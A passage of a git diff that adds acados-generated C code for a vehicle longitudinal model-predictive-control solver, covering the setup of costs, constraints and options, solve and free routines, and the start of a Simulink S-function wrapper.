+ capsule->nl_constr_h_fun_jac = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N; i++) { + MAP_CASADI_FNC(nl_constr_h_fun_jac[i], long_constr_h_fun_jac_uxt_zt); + } + capsule->nl_constr_h_fun = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N; i++) { + MAP_CASADI_FNC(nl_constr_h_fun[i], long_constr_h_fun); + } + + + + + // explicit ode + capsule->forw_vde_casadi = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N; i++) { + MAP_CASADI_FNC(forw_vde_casadi[i], long_expl_vde_forw); + } + + capsule->expl_ode_fun = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N; i++) { + MAP_CASADI_FNC(expl_ode_fun[i], long_expl_ode_fun); + } + + + // nonlinear least squares function + MAP_CASADI_FNC(cost_y_0_fun, long_cost_y_0_fun); + MAP_CASADI_FNC(cost_y_0_fun_jac_ut_xt, long_cost_y_0_fun_jac_ut_xt); + MAP_CASADI_FNC(cost_y_0_hess, long_cost_y_0_hess); + // nonlinear least squares cost + capsule->cost_y_fun = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N-1; i++) + { + MAP_CASADI_FNC(cost_y_fun[i], long_cost_y_fun); + } + + capsule->cost_y_fun_jac_ut_xt = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N-1; i++) + { + MAP_CASADI_FNC(cost_y_fun_jac_ut_xt[i], long_cost_y_fun_jac_ut_xt); + } + + capsule->cost_y_hess = (external_function_param_casadi *) malloc(sizeof(external_function_param_casadi)*N); + for (int i = 0; i < N-1; i++) + { + MAP_CASADI_FNC(cost_y_hess[i], long_cost_y_hess); + } + // nonlinear least square function + MAP_CASADI_FNC(cost_y_e_fun, long_cost_y_e_fun); + MAP_CASADI_FNC(cost_y_e_fun_jac_ut_xt, long_cost_y_e_fun_jac_ut_xt); + MAP_CASADI_FNC(cost_y_e_hess, long_cost_y_e_hess); + +#undef MAP_CASADI_FNC +} + + +/** + * Internal function for long_acados_create: step 4 + */ +void long_acados_create_4_set_default_parameters(long_solver_capsule* capsule) { + const int N = capsule->nlp_solver_plan->N; + // initialize parameters to nominal value + double* p = calloc(NP, sizeof(double)); + p[0] = -1.2; + p[1] = 1.2; + p[4] = 1.45; + p[5] = 0.75; + + for (int i = 0; i <= N; i++) { + long_acados_update_params(capsule, i, p, NP); + } + free(p); +} + + +/** + * Internal function for long_acados_create: step 5 + */ +void long_acados_create_5_set_nlp_in(long_solver_capsule* capsule, const int N, double* new_time_steps) +{ + assert(N == capsule->nlp_solver_plan->N); + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + + /************************************************ + * nlp_in + ************************************************/ +// ocp_nlp_in * nlp_in = ocp_nlp_in_create(nlp_config, nlp_dims); +// capsule->nlp_in = nlp_in; + ocp_nlp_in * nlp_in = capsule->nlp_in; + + // set up time_steps + + + if (new_time_steps) { + long_acados_update_time_steps(capsule, N, new_time_steps); + } else {// time_steps are different + double* time_steps = malloc(N*sizeof(double)); + time_steps[0] = 0.06944444444444445; + time_steps[1] = 0.20833333333333337; + time_steps[2] = 0.3472222222222222; + time_steps[3] = 0.4861111111111112; + time_steps[4] = 0.6250000000000002; + time_steps[5] = 0.7638888888888886; + time_steps[6] = 0.9027777777777786; + time_steps[7] = 1.041666666666666; + time_steps[8] = 1.1805555555555554; + time_steps[9] = 1.3194444444444455; + time_steps[10] = 1.4583333333333313; + time_steps[11] = 1.5972222222222232; + long_acados_update_time_steps(capsule, N, time_steps); + free(time_steps); + } + + /**** Dynamics ****/ + for (int i = 0; i < N; i++) + { + ocp_nlp_dynamics_model_set(nlp_config, nlp_dims, nlp_in, i, "expl_vde_forw", &capsule->forw_vde_casadi[i]); + ocp_nlp_dynamics_model_set(nlp_config, nlp_dims, nlp_in, i, "expl_ode_fun", &capsule->expl_ode_fun[i]); + + } + + /**** Cost ****/ + double* W_0 = calloc(NY0*NY0, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "W", W_0); + free(W_0); + + double* yref_0 = calloc(NY0, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "yref", yref_0); + free(yref_0); + double* W = calloc(NY*NY, sizeof(double)); + // change only the non-zero elements: + + double* yref = calloc(NY, sizeof(double)); + // change only the non-zero elements: + + for (int i = 1; i < N; i++) + { + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "W", W); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "yref", yref); + } + free(W); + free(yref); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "nls_y_fun", &capsule->cost_y_0_fun); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "nls_y_fun_jac", &capsule->cost_y_0_fun_jac_ut_xt); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "nls_y_hess", &capsule->cost_y_0_hess); + for (int i = 1; i < N; i++) + { + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "nls_y_fun", &capsule->cost_y_fun[i-1]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "nls_y_fun_jac", &capsule->cost_y_fun_jac_ut_xt[i-1]); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "nls_y_hess", &capsule->cost_y_hess[i-1]); + } + double* zlumem = calloc(4*NS, sizeof(double)); + double* Zl = zlumem+NS*0; + double* Zu = zlumem+NS*1; + double* zl = zlumem+NS*2; + double* zu = zlumem+NS*3; + // change only the non-zero elements: + + for (int i = 0; i < N; i++) + { + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "Zl", Zl); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "Zu", Zu); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "zl", zl); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, i, "zu", zu); + } + free(zlumem); + + // terminal cost + double* yref_e = calloc(NYN, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "yref", yref_e); + free(yref_e); + + double* W_e = calloc(NYN*NYN, sizeof(double)); + // change only the non-zero elements: + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "W", W_e); + free(W_e); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "nls_y_fun", &capsule->cost_y_e_fun); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "nls_y_fun_jac", &capsule->cost_y_e_fun_jac_ut_xt); + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, N, "nls_y_hess", &capsule->cost_y_e_hess); + + + + /**** Constraints ****/ + + // bounds for initial stage + // x0 + int* idxbx0 = malloc(NBX0 * sizeof(int)); + idxbx0[0] = 0; + idxbx0[1] = 1; + idxbx0[2] = 2; + + double* lubx0 = calloc(2*NBX0, sizeof(double)); + double* lbx0 = lubx0; + double* ubx0 = lubx0 + NBX0; + // change only the non-zero elements: + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "idxbx", idxbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "lbx", lbx0); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "ubx", ubx0); + free(idxbx0); + free(lubx0); + // idxbxe_0 + int* idxbxe_0 = malloc(3 * sizeof(int)); + + idxbxe_0[0] = 0; + idxbxe_0[1] = 1; + idxbxe_0[2] = 2; + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "idxbxe", idxbxe_0); + free(idxbxe_0); + + /* constraints that are the same for initial and intermediate */ + + + + + // set up soft bounds for nonlinear constraints + int* idxsh = malloc(NSH * sizeof(int)); + + idxsh[0] = 0; + idxsh[1] = 1; + idxsh[2] = 2; + idxsh[3] = 3; + double* lush = calloc(2*NSH, sizeof(double)); + double* lsh = lush; + double* ush = lush + NSH; + + + for (int i = 0; i < N; i++) + { + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "idxsh", idxsh); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "lsh", lsh); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "ush", ush); + } + free(idxsh); + free(lush); + + + + + + + + + // set up nonlinear constraints for stage 0 to N-1 + double* luh = calloc(2*NH, sizeof(double)); + double* lh = luh; + double* uh = luh + NH; + + + + + uh[0] = 10000; + uh[1] = 10000; + uh[2] = 10000; + uh[3] = 10000; + + for (int i = 0; i < N; i++) + { + // nonlinear constraints for stages 0 to N-1 + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "nl_constr_h_fun_jac", + &capsule->nl_constr_h_fun_jac[i]); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "nl_constr_h_fun", + &capsule->nl_constr_h_fun[i]); + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "lh", lh); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, i, "uh", uh); + } + free(luh); + + + + /* terminal constraints */ + + + + + + + + + + + + + + + +} + + +/** + * Internal function for long_acados_create: step 6 + */ +void long_acados_create_6_set_opts(long_solver_capsule* capsule) +{ + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + void *nlp_opts = capsule->nlp_opts; + + /************************************************ + * opts + ************************************************/ + + + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "globalization", "fixed_step");int full_step_dual = 0; + ocp_nlp_solver_opts_set(nlp_config, capsule->nlp_opts, "full_step_dual", &full_step_dual); + + // set collocation type (relevant for implicit integrators) + sim_collocation_type collocation_type = GAUSS_LEGENDRE; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_collocation_type", &collocation_type); + + // set up sim_method_num_steps + // all sim_method_num_steps are identical + int sim_method_num_steps = 1; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_num_steps", &sim_method_num_steps); + + // set up sim_method_num_stages + // all sim_method_num_stages are identical + int sim_method_num_stages = 4; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_num_stages", &sim_method_num_stages); + + int newton_iter_val = 3; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_newton_iter", &newton_iter_val); + + + // set up sim_method_jac_reuse + bool tmp_bool = (bool) 0; + for (int i = 0; i < N; i++) + ocp_nlp_solver_opts_set_at_stage(nlp_config, nlp_opts, i, "dynamics_jac_reuse", &tmp_bool); + + double nlp_solver_step_length = 1; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "step_length", &nlp_solver_step_length); + + double levenberg_marquardt = 0; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "levenberg_marquardt", &levenberg_marquardt); + + /* options QP solver */ + int qp_solver_cond_N; + + const int qp_solver_cond_N_ori = 1; + qp_solver_cond_N = N < qp_solver_cond_N_ori ? N : qp_solver_cond_N_ori; // use the minimum value here + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_cond_N", &qp_solver_cond_N); + // set HPIPM mode: should be done before setting other QP solver options + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_hpipm_mode", "BALANCE"); + + + + int qp_solver_iter_max = 10; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_iter_max", &qp_solver_iter_max); + + + double qp_solver_tol_stat = 0.001; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_tol_stat", &qp_solver_tol_stat); + double qp_solver_tol_eq = 0.001; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_tol_eq", &qp_solver_tol_eq); + double qp_solver_tol_ineq = 0.001; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_tol_ineq", &qp_solver_tol_ineq); + double qp_solver_tol_comp = 0.001; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "qp_tol_comp", &qp_solver_tol_comp);int print_level = 0; + ocp_nlp_solver_opts_set(nlp_config, nlp_opts, "print_level", &print_level); + + + int ext_cost_num_hess = 0; +} + + +/** + * Internal function for long_acados_create: step 7 + */ +void long_acados_create_7_set_nlp_out(long_solver_capsule* capsule) +{ + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + ocp_nlp_out* nlp_out = capsule->nlp_out; + + // initialize primal solution + double* xu0 = calloc(NX+NU, sizeof(double)); + double* x0 = xu0; + + // initialize with x0 + + + + double* u0 = xu0 + NX; + + for (int i = 0; i < N; i++) + { + // x0 + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "x", x0); + // u0 + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, i, "u", u0); + } + ocp_nlp_out_set(nlp_config, nlp_dims, nlp_out, N, "x", x0); + free(xu0); +} + + +/** + * Internal function for long_acados_create: step 8 + */ +//void long_acados_create_8_create_solver(long_solver_capsule* capsule) +//{ +// capsule->nlp_solver = ocp_nlp_solver_create(capsule->nlp_config, capsule->nlp_dims, capsule->nlp_opts); +//} + +/** + * Internal function for long_acados_create: step 9 + */ +int long_acados_create_9_precompute(long_solver_capsule* capsule) { + int status = ocp_nlp_precompute(capsule->nlp_solver, capsule->nlp_in, capsule->nlp_out); + + if (status != ACADOS_SUCCESS) { + printf("\nocp_nlp_precompute failed!\n\n"); + exit(1); + } + + return status; +} + + +int long_acados_create_with_discretization(long_solver_capsule* capsule, int N, double* new_time_steps) +{ + // If N does not match the number of shooting intervals used for code generation, new_time_steps must be given. + if (N != LONG_N && !new_time_steps) { + fprintf(stderr, "long_acados_create_with_discretization: new_time_steps is NULL " \ + "but the number of shooting intervals (= %d) differs from the number of " \ + "shooting intervals (= %d) during code generation! Please provide a new vector of time_stamps!\n", \ + N, LONG_N); + return 1; + } + + // number of expected runtime parameters + capsule->nlp_np = NP; + + // 1) create and set nlp_solver_plan; create nlp_config + capsule->nlp_solver_plan = ocp_nlp_plan_create(N); + long_acados_create_1_set_plan(capsule->nlp_solver_plan, N); + capsule->nlp_config = ocp_nlp_config_create(*capsule->nlp_solver_plan); + + // 3) create and set dimensions + capsule->nlp_dims = long_acados_create_2_create_and_set_dimensions(capsule); + long_acados_create_3_create_and_set_functions(capsule); + + // 4) set default parameters in functions + long_acados_create_4_set_default_parameters(capsule); + + // 5) create and set nlp_in + capsule->nlp_in = ocp_nlp_in_create(capsule->nlp_config, capsule->nlp_dims); + long_acados_create_5_set_nlp_in(capsule, N, new_time_steps); + + // 6) create and set nlp_opts + capsule->nlp_opts = ocp_nlp_solver_opts_create(capsule->nlp_config, capsule->nlp_dims); + long_acados_create_6_set_opts(capsule); + + // 7) create and set nlp_out + // 7.1) nlp_out + capsule->nlp_out = ocp_nlp_out_create(capsule->nlp_config, capsule->nlp_dims); + // 7.2) sens_out + capsule->sens_out = ocp_nlp_out_create(capsule->nlp_config, capsule->nlp_dims); + long_acados_create_7_set_nlp_out(capsule); + + // 8) create solver + capsule->nlp_solver = ocp_nlp_solver_create(capsule->nlp_config, capsule->nlp_dims, capsule->nlp_opts); + //long_acados_create_8_create_solver(capsule); + + // 9) do precomputations + int status = long_acados_create_9_precompute(capsule); + return status; +} + +/** + * This function is for updating an already initialized solver with a different number of qp_cond_N. It is useful for code reuse after code export. + */ +int long_acados_update_qp_solver_cond_N(long_solver_capsule* capsule, int qp_solver_cond_N) +{ + // 1) destroy solver + ocp_nlp_solver_destroy(capsule->nlp_solver); + + // 2) set new value for "qp_cond_N" + const int N = capsule->nlp_solver_plan->N; + if(qp_solver_cond_N > N) + printf("Warning: qp_solver_cond_N = %d > N = %d\n", qp_solver_cond_N, N); + ocp_nlp_solver_opts_set(capsule->nlp_config, capsule->nlp_opts, "qp_cond_N", &qp_solver_cond_N); + + // 3) continue with the remaining steps from long_acados_create_with_discretization(...): + // -> 8) create solver + capsule->nlp_solver = ocp_nlp_solver_create(capsule->nlp_config, capsule->nlp_dims, capsule->nlp_opts); + + // -> 9) do precomputations + int status = long_acados_create_9_precompute(capsule); + return status; +} + + +int long_acados_reset(long_solver_capsule* capsule) +{ + + // set initialization to all zeros + + const int N = capsule->nlp_solver_plan->N; + ocp_nlp_config* nlp_config = capsule->nlp_config; + ocp_nlp_dims* nlp_dims = capsule->nlp_dims; + ocp_nlp_out* nlp_out = capsule->nlp_out; + ocp_nlp_in* nlp_in = capsule->nlp_in; + ocp_nlp_solver* nlp_solver = capsule->nlp_solver; + + int nx, nu, nv, ns, nz, ni, dim; + + double* buffer = calloc(NX+NU+NZ+2*NS+2*NSN+NBX+NBU+NG+NH+NPHI+NBX0+NBXN+NHN+NPHIN+NGN, sizeof(double)); + + for(int i=0; i reset memory + int qp_status; + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "qp_status", &qp_status); + if (qp_status == 3) + { + // printf("\nin reset qp_status %d -> resetting QP memory\n", qp_status); + ocp_nlp_solver_reset_qp_memory(nlp_solver, nlp_in, nlp_out); + } + + free(buffer); + return 0; +} + + + + +int long_acados_update_params(long_solver_capsule* capsule, int stage, double *p, int np) +{ + int solver_status = 0; + + int casadi_np = 6; + if (casadi_np != np) { + printf("acados_update_params: trying to set %i parameters for external functions." + " External function has %i parameters. Exiting.\n", np, casadi_np); + exit(1); + } + const int N = capsule->nlp_solver_plan->N; + if (stage < N && stage >= 0) + { + capsule->forw_vde_casadi[stage].set_param(capsule->forw_vde_casadi+stage, p); + capsule->expl_ode_fun[stage].set_param(capsule->expl_ode_fun+stage, p); + + + // constraints + + capsule->nl_constr_h_fun_jac[stage].set_param(capsule->nl_constr_h_fun_jac+stage, p); + capsule->nl_constr_h_fun[stage].set_param(capsule->nl_constr_h_fun+stage, p); + + // cost + if (stage == 0) + { + capsule->cost_y_0_fun.set_param(&capsule->cost_y_0_fun, p); + capsule->cost_y_0_fun_jac_ut_xt.set_param(&capsule->cost_y_0_fun_jac_ut_xt, p); + capsule->cost_y_0_hess.set_param(&capsule->cost_y_0_hess, p); + } + else // 0 < stage < N + { + capsule->cost_y_fun[stage-1].set_param(capsule->cost_y_fun+stage-1, p); + capsule->cost_y_fun_jac_ut_xt[stage-1].set_param(capsule->cost_y_fun_jac_ut_xt+stage-1, p); + capsule->cost_y_hess[stage-1].set_param(capsule->cost_y_hess+stage-1, p); + } + } + + else // stage == N + { + // terminal shooting node has no dynamics + // cost + capsule->cost_y_e_fun.set_param(&capsule->cost_y_e_fun, p); + capsule->cost_y_e_fun_jac_ut_xt.set_param(&capsule->cost_y_e_fun_jac_ut_xt, p); + capsule->cost_y_e_hess.set_param(&capsule->cost_y_e_hess, p); + // constraints + + } + + + return solver_status; +} + + + +int long_acados_solve(long_solver_capsule* capsule) +{ + // solve NLP + int solver_status = ocp_nlp_solve(capsule->nlp_solver, capsule->nlp_in, capsule->nlp_out); + + return solver_status; +} + + +int long_acados_free(long_solver_capsule* capsule) +{ + // before destroying, keep some info + const int N = capsule->nlp_solver_plan->N; + // free memory + ocp_nlp_solver_opts_destroy(capsule->nlp_opts); + ocp_nlp_in_destroy(capsule->nlp_in); + ocp_nlp_out_destroy(capsule->nlp_out); + ocp_nlp_out_destroy(capsule->sens_out); + ocp_nlp_solver_destroy(capsule->nlp_solver); + ocp_nlp_dims_destroy(capsule->nlp_dims); + ocp_nlp_config_destroy(capsule->nlp_config); + ocp_nlp_plan_destroy(capsule->nlp_solver_plan); + + /* free external function */ + // dynamics + for (int i = 0; i < N; i++) + { + external_function_param_casadi_free(&capsule->forw_vde_casadi[i]); + external_function_param_casadi_free(&capsule->expl_ode_fun[i]); + } + free(capsule->forw_vde_casadi); + free(capsule->expl_ode_fun); + + // cost + external_function_param_casadi_free(&capsule->cost_y_0_fun); + external_function_param_casadi_free(&capsule->cost_y_0_fun_jac_ut_xt); + external_function_param_casadi_free(&capsule->cost_y_0_hess); + for (int i = 0; i < N - 1; i++) + { + external_function_param_casadi_free(&capsule->cost_y_fun[i]); + external_function_param_casadi_free(&capsule->cost_y_fun_jac_ut_xt[i]); + external_function_param_casadi_free(&capsule->cost_y_hess[i]); + } + free(capsule->cost_y_fun); + free(capsule->cost_y_fun_jac_ut_xt); + free(capsule->cost_y_hess); + external_function_param_casadi_free(&capsule->cost_y_e_fun); + external_function_param_casadi_free(&capsule->cost_y_e_fun_jac_ut_xt); + external_function_param_casadi_free(&capsule->cost_y_e_hess); + + // constraints + for (int i = 0; i < N; i++) + { + external_function_param_casadi_free(&capsule->nl_constr_h_fun_jac[i]); + external_function_param_casadi_free(&capsule->nl_constr_h_fun[i]); + } + free(capsule->nl_constr_h_fun_jac); + free(capsule->nl_constr_h_fun); + + return 0; +} + +ocp_nlp_in *long_acados_get_nlp_in(long_solver_capsule* capsule) { return capsule->nlp_in; } +ocp_nlp_out *long_acados_get_nlp_out(long_solver_capsule* capsule) { return capsule->nlp_out; } +ocp_nlp_out *long_acados_get_sens_out(long_solver_capsule* capsule) { return capsule->sens_out; } +ocp_nlp_solver *long_acados_get_nlp_solver(long_solver_capsule* capsule) { return capsule->nlp_solver; } +ocp_nlp_config *long_acados_get_nlp_config(long_solver_capsule* capsule) { return capsule->nlp_config; } +void *long_acados_get_nlp_opts(long_solver_capsule* capsule) { return capsule->nlp_opts; } +ocp_nlp_dims *long_acados_get_nlp_dims(long_solver_capsule* capsule) { return capsule->nlp_dims; } +ocp_nlp_plan_t *long_acados_get_nlp_plan(long_solver_capsule* capsule) { return capsule->nlp_solver_plan; } + + +void long_acados_print_stats(long_solver_capsule* capsule) +{ + int sqp_iter, stat_m, stat_n, tmp_int; + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "sqp_iter", &sqp_iter); + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "stat_n", &stat_n); + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "stat_m", &stat_m); + + + double stat[1200]; + ocp_nlp_get(capsule->nlp_config, capsule->nlp_solver, "statistics", stat); + + int nrow = sqp_iter+1 < stat_m ? sqp_iter+1 : stat_m; + printf("iter\tqp_stat\tqp_iter\n"); + for (int i = 0; i < nrow; i++) + { + for (int j = 0; j < stat_n + 1; j++) + { + tmp_int = (int) stat[i + j * nrow]; + printf("%d\t", tmp_int); + } + printf("\n"); + } +} + diff --git a/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_solver_sfunction_long.c b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_solver_sfunction_long.c new file mode 100644 index 000000000..41b6d4431 --- /dev/null +++ b/selfdrive/controls/lib/longitudinal_mpc_lib/c_generated_code/acados_solver_sfunction_long.c @@ -0,0 +1,264 @@ +/* + * Copyright 2019 Gianluca Frison, Dimitris Kouzoupis, Robin Verschueren, + * Andrea Zanelli, Niels van Duijkeren, Jonathan Frey, Tommaso Sartor, + * Branimir Novoselnik, Rien Quirynen, Rezart Qelibari, Dang Doan, + * Jonas Koenemann, Yutao Chen, Tobias Schöls, Jonas Schlagenhauf, Moritz Diehl + * + * This file is part of acados. + * + * The 2-Clause BSD License + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, + * this list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE + * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR + * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF + * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS + * INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN + * CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) + * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE + * POSSIBILITY OF SUCH DAMAGE.; + */ + +#define S_FUNCTION_NAME acados_solver_sfunction_long +#define S_FUNCTION_LEVEL 2 + +#define MDL_START + +// acados +// #include "acados/utils/print.h" +#include "acados_c/sim_interface.h" +#include "acados_c/external_function_interface.h" + +// example specific +#include "long_model/long_model.h" +#include "acados_solver_long.h" + +#include "simstruc.h" + +#define SAMPLINGTIME 0.06944444444444445 + +static void mdlInitializeSizes (SimStruct *S) +{ + // specify the number of continuous and discrete states + ssSetNumContStates(S, 0); + ssSetNumDiscStates(S, 0);// specify the number of input ports + if ( !ssSetNumInputPorts(S, 8) ) + return; + + // specify the number of output ports + if ( !ssSetNumOutputPorts(S, 6) ) + return; + + // specify dimension information for the input ports + // lbx_0 + ssSetInputPortVectorDimension(S, 0, 3); + // ubx_0 + ssSetInputPortVectorDimension(S, 1, 3); + // parameters + ssSetInputPortVectorDimension(S, 2, (12+1) * 6); + // y_ref_0 + ssSetInputPortVectorDimension(S, 3, 6); + // y_ref + ssSetInputPortVectorDimension(S, 4, 66); + // y_ref_e + ssSetInputPortVectorDimension(S, 5, 5); + // lh + ssSetInputPortVectorDimension(S, 6, 4); + // uh + ssSetInputPortVectorDimension(S, 7, 4);/* specify dimension information for the OUTPUT ports */ + ssSetOutputPortVectorDimension(S, 0, 1 ); + ssSetOutputPortVectorDimension(S, 1, 1 ); + ssSetOutputPortVectorDimension(S, 2, 1 ); + ssSetOutputPortVectorDimension(S, 3, 3 ); // state at shooting node 1 + ssSetOutputPortVectorDimension(S, 4, 1); + ssSetOutputPortVectorDimension(S, 5, 1 ); + + // specify the direct feedthrough status + // should be set to 1 for all inputs used in mdlOutputs + ssSetInputPortDirectFeedThrough(S, 0, 1); + ssSetInputPortDirectFeedThrough(S, 1, 1); + ssSetInputPortDirectFeedThrough(S, 2, 1); + ssSetInputPortDirectFeedThrough(S, 3, 1); + ssSetInputPortDirectFeedThrough(S, 4, 1); + ssSetInputPortDirectFeedThrough(S, 5, 1); + ssSetInputPortDirectFeedThrough(S, 6, 1); + ssSetInputPortDirectFeedThrough(S, 7, 1); + + // one sample time + ssSetNumSampleTimes(S, 1); +} + + +#if defined(MATLAB_MEX_FILE) + +#define MDL_SET_INPUT_PORT_DIMENSION_INFO +#define MDL_SET_OUTPUT_PORT_DIMENSION_INFO + +static void mdlSetInputPortDimensionInfo(SimStruct *S, int_T port, const DimsInfo_T *dimsInfo) +{ + if ( !ssSetInputPortDimensionInfo(S, port, dimsInfo) ) + return; +} + +static void mdlSetOutputPortDimensionInfo(SimStruct *S, int_T port, const DimsInfo_T *dimsInfo) +{ + if ( !ssSetOutputPortDimensionInfo(S, port, dimsInfo) ) + return; +} + +#endif /* MATLAB_MEX_FILE */ + + +static void mdlInitializeSampleTimes(SimStruct *S) +{ + ssSetSampleTime(S, 0, SAMPLINGTIME); + ssSetOffsetTime(S, 0, 0.0); +} + + +static void mdlStart(SimStruct *S) +{ + long_solver_capsule *capsule = long_acados_create_capsule(); + long_acados_create(capsule); + + ssSetUserData(S, (void*)capsule); +} + + +static void mdlOutputs(SimStruct *S, int_T tid) +{ + long_solver_capsule *capsule = ssGetUserData(S); + ocp_nlp_config *nlp_config = long_acados_get_nlp_config(capsule); + ocp_nlp_dims *nlp_dims = long_acados_get_nlp_dims(capsule); + ocp_nlp_in *nlp_in = long_acados_get_nlp_in(capsule); + ocp_nlp_out *nlp_out = long_acados_get_nlp_out(capsule); + + InputRealPtrsType in_sign; + + // local buffer + real_t buffer[6]; + + /* go through inputs */ + // lbx_0 + in_sign = ssGetInputPortRealSignalPtrs(S, 0); + for (int i = 0; i < 3; i++) + buffer[i] = (double)(*in_sign[i]); + + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "lbx", buffer); + // ubx_0 + in_sign = ssGetInputPortRealSignalPtrs(S, 1); + for (int i = 0; i < 3; i++) + buffer[i] = (double)(*in_sign[i]); + ocp_nlp_constraints_model_set(nlp_config, nlp_dims, nlp_in, 0, "ubx", buffer); + // parameters - stage-variant !!! + in_sign = ssGetInputPortRealSignalPtrs(S, 2); + + // update value of parameters + for (int ii = 0; ii <= 12; ii++) + { + for (int jj = 0; jj < 6; jj++) + buffer[jj] = (double)(*in_sign[ii*6+jj]); + long_acados_update_params(capsule, ii, buffer, 6); + } + + + // y_ref_0 + in_sign = ssGetInputPortRealSignalPtrs(S, 3); + + for (int i = 0; i < 6; i++) + buffer[i] = (double)(*in_sign[i]); + + ocp_nlp_cost_model_set(nlp_config, nlp_dims, nlp_in, 0, "yref", (void *) buffer); + + + 